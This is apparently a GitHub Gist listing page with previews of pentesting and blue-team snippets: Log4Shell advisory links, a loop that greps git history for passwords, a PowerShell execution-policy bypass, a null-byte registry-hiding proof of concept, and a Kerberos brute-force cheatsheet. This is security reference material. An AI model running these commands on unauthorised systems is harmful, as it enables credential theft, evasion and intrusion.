Skip to content

Instantly share code, notes, and snippets.

@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active Oct 4, 2022
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC
View 20211210-TLP-WHITE_LOG4J.md

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
View Git Creds.md

Finding creds in git repos is awesome.

$ for commit in $(seq 1 $(git reflog | wc -l)); do git diff HEAD@{$commit} 2>/dev/null | grep password; done
-spring.datasource.password=g!'301T%y%xT@uL`
+spring.datasource.password=4AT&G;[H@&'\^uDK
-spring.datasource.password=UmAnR=-v|{2=gyx?
+spring.datasource.password=4AT&G;[H@&'\^uDK
...
@clr2of8
clr2of8 / bypassPowershellExecutionPolicy.ps1
Created Oct 24, 2020
bypass powershell execution policy
View bypassPowershellExecutionPolicy.ps1
# from https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}
Disable-ExecutionPolicy
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active Oct 1, 2022
A list of 3203 common API endpoints and objects designed for fuzzing.
View List of API endpoints & objects
0
00
01
02
03
1
1.0
10
100
1000
@szski
szski / GraphQL-Introspection-Query-Url-Encoded
Created Oct 6, 2019
Append this string after https://examplegqlapi.com/?query= to test for introspection query
View GraphQL-Introspection-Query-Url-Encoded
query%20IntrospectionQuery%20%7B%0A%20%20%20%20__schema%20%7B%0A%20%20%20%20%20%20queryType%20%7B%20name%20%7D%0A%20%20%20%20%20%20mutationType%20%7B%20name%20%7D%0A%20%20%20%20%20%20types%20%7B%0A%20%20%20%20%20%20%20%20...FullType%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20directives%20%7B%0A%20%20%20%20%20%20%20%20name%0A%20%20%20%20%20%20%20%20description%0A%20%20%20%20%20%20%20%20locations%0A%20%20%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%7D%0A%20%20fragment%20FullType%20on%20__Type%20%7B%0A%20%20%20%20kind%0A%20%20%20%20name%0A%20%20%20%20description%0A%20%20%20%20fields%28includeDeprecated%3A%20true%29%20%7B%0A%20%20%20%20%20%20name%0A%20%20%20%20%20%20description%0A%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20type%20%7B%0A%20%20%20%20%20%20%20%20...TypeRef%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20isDeprecated%0A%20%20%
@Graph-X
Graph-X / ironregistry.py
Last active Oct 1, 2019
PoC for hiding things in the registry. My testing hasn't returned any errors when viewing in regedit
View ironregistry.py
from Microsoft.Win32 import Registry
from time import sleep
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
rkey.SetValue(u'\x00 this is a test',u'\x00look at me!')
rkey.Close()
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest")
values = rkey.GetValueNames()
print("We have {0} values.".format(str(len(values))))
print("The value names returned are: {0}.".format(values[0]))
value = rkey.GetValue(u'\x00 this is a test')
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019
A cheatsheet with commands that can be used to perform kerberos attacks
View kerberos_attacks_cheatsheet.md

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@mritunjay-k
mritunjay-k / whats_ur_status.py
Last active Nov 24, 2019
Provide it a list of domains and it will show you which of them is 200 OK or 404 NOT FOUND (extremly helpful for web application bug hunting)
View whats_ur_status.py
#!/usr/bin/env python
import requests
try:
read_file = open(input("Enter path of the file containing subdomains: "),'r')
for host in read_file:
domain = host.rstrip("\n")
try:
View http_screenshot.py
# Author: b0yd @rwincey
# Website: securifera.com
#
# Setup:
# -------------------------------------------------
# pip install selenium
# wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
# google-chrome-stable --version
# Vist http://chromedriver.chromium.org/downloads to identity the right version
# wget https://chromedriver.storage.googleapis.com/72.0.3626.69/chromedriver_linux64.zip
@yougg
yougg / proxy.md
Last active Oct 2, 2022
complete ways to set http/socks/ssh proxy environment variables
View proxy.md

set http or socks proxy environment variables

# set http proxy
export http_proxy=http://PROXYHOST:PROXYPORT

# set http proxy with user and password
export http_proxy=http://USERNAME:PASSWORD@PROXYHOST:PROXYPORT

# set http proxy with user and password (with special characters)